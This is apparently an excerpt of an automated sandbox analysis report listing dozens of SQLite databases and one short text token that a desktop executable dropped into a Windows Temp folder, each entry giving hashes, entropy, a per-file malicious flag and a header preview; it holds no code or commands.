                                                                    SHA-512:90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\SYeXkKza64

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.1358696453229276
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\SaqJX6aln5

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):49152
                                                                    Entropy (8bit):0.8180424350137764
                                                                    Encrypted:false
                                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\SdcmTD33aW

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.1358696453229276
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                    MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                    SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                    SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                    SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\SlNGvrEYII

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                    Category:dropped
                                                                    Size (bytes):114688
                                                                    Entropy (8bit):0.9746603542602881
                                                                    Encrypted:false
                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\So5v5XOTna

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):49152
                                                                    Entropy (8bit):0.8180424350137764
                                                                    Encrypted:false
                                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\T1v6cYxDLM

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 5
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.848598812124929
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLVF1kwNbXYFpFNYcw+6UwcQVXH5fBODYfOg1ZAJFF0DiUhQ5de5SjhXE1:ThFawNLopFgU10XJBODqzqFF0DYde5P
                                                                    MD5:9664DAA86F8917816B588C715D97BE07
                                                                    SHA1:FAD9771763CD861ED8F3A57004C4B371422B7761
                                                                    SHA-256:8FED359D88F0588829BA60D236269B2528742F7F66DF3ACF22B32B8F883FE785
                                                                    SHA-512:E551D5CC3D5709EE00F85BB92A25DDC96112A4357DFEA3D859559D47DB30FEBD2FD36BDFA2BEC6DCA63D3E233996E9FCD2237F92CEE5B32BA8D7F2E1913B2DA9
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\TI7mbfa7Li

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\TIScuAaN1v

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\TLQhRoRzHr

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5712781801655107
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\TPPTqRsOpt

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.137181696973627
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
                                                                    MD5:2D903A087A0C793BDB82F6426B1E8EFB
                                                                    SHA1:E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
                                                                    SHA-256:AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
                                                                    SHA-512:90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\TbpiBDU1OZ

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\Teak5OjKyF

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\TjvKSuhddq

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\TrwukxifuV

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\TvSVaZuk2S

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                    Category:dropped
                                                                    Size (bytes):114688
                                                                    Entropy (8bit):0.9746603542602881
                                                                    Encrypted:false
                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\TwQCSkGr2R

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\U24OuwX8KC

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                    Category:dropped
                                                                    Size (bytes):114688
                                                                    Entropy (8bit):0.9746603542602881
                                                                    Encrypted:false
                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\U6yxkCe1F9

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5712781801655107
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\UChkdZlbvC

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.137181696973627
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
                                                                    MD5:2D903A087A0C793BDB82F6426B1E8EFB
                                                                    SHA1:E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
                                                                    SHA-256:AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
                                                                    SHA-512:90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\UMHQVUykHb

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):1.3909341910495931
                                                                    Encrypted:false
                                                                    SSDEEP:48:ToyFawNLopFgU10XJBjKwsBjAFMtt/qEM0g9gingQeroAsaC7cUXt9P:cyxe8OwsiFMttSzefroYC7J9P
                                                                    MD5:1EB30D95ED94CA01369986C3811A0591
                                                                    SHA1:D7277FF6C5D5F55A4B0576045C2928D7501E7AFC
                                                                    SHA-256:CA8D4F98E4AD0ED1F66819E90024EB527A7A46DC26D84FB9FF5F1829B6331F46
                                                                    SHA-512:D5C8BA028977ABA2416D2C02D50FD2535F646003D8F443A01E00C6FC9385F16A6C051502D3947CABF592C619E3E0A22EC586AD57876E517C7B5BB749D396ABA7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\UR0UvRPyTf

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 5
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.848598812124929
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLVF1kwNbXYFpFNYcw+6UwcQVXH5fBODYfOg1ZAJFF0DiUhQ5de5SjhXE1:ThFawNLopFgU10XJBODqzqFF0DYde5P
                                                                    MD5:9664DAA86F8917816B588C715D97BE07
                                                                    SHA1:FAD9771763CD861ED8F3A57004C4B371422B7761
                                                                    SHA-256:8FED359D88F0588829BA60D236269B2528742F7F66DF3ACF22B32B8F883FE785
                                                                    SHA-512:E551D5CC3D5709EE00F85BB92A25DDC96112A4357DFEA3D859559D47DB30FEBD2FD36BDFA2BEC6DCA63D3E233996E9FCD2237F92CEE5B32BA8D7F2E1913B2DA9
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\UW3LURBoYL

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):1.3909341910495931
                                                                    Encrypted:false
                                                                    SSDEEP:48:ToyFawNLopFgU10XJBjKwsBjAFMtt/qEM0g9gingQeroAsaC7cUXt9P:cyxe8OwsiFMttSzefroYC7J9P
                                                                    MD5:1EB30D95ED94CA01369986C3811A0591
                                                                    SHA1:D7277FF6C5D5F55A4B0576045C2928D7501E7AFC
                                                                    SHA-256:CA8D4F98E4AD0ED1F66819E90024EB527A7A46DC26D84FB9FF5F1829B6331F46
                                                                    SHA-512:D5C8BA028977ABA2416D2C02D50FD2535F646003D8F443A01E00C6FC9385F16A6C051502D3947CABF592C619E3E0A22EC586AD57876E517C7B5BB749D396ABA7
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    C:\Users\user\AppData\Local\Temp\Un9LJzMdAd

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):25
                                                                    Entropy (8bit):4.323856189774723
                                                                    Encrypted:false
                                                                    SSDEEP:3:q4TMWCU:5TMWCU
                                                                    MD5:951583D11D917E8650F7250A22DF643F
                                                                    SHA1:C8DB8DB7C67064AEE14FD5311A5076A53F4581B6
                                                                    SHA-256:C8C508111F8145A38B73CA24B7C38C9AC7D6989F0DC94001E9F411CB0B95298D
                                                                    SHA-512:83DD2E5D02CFFD14222092D100A0EC6C8E4457C049F0A973468C909B087AF472C0952B3AAC88D6063E79B19D66E440D77AB76287DE9D1CA236F8877B1B3FCB5C
                                                                    Malicious:false
                                                                    Preview:ZRP3bp1DOMzAbto2L4o3wBIL6

                                                                    C:\Users\user\AppData\Local\Temp\V4gotnkgjA

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
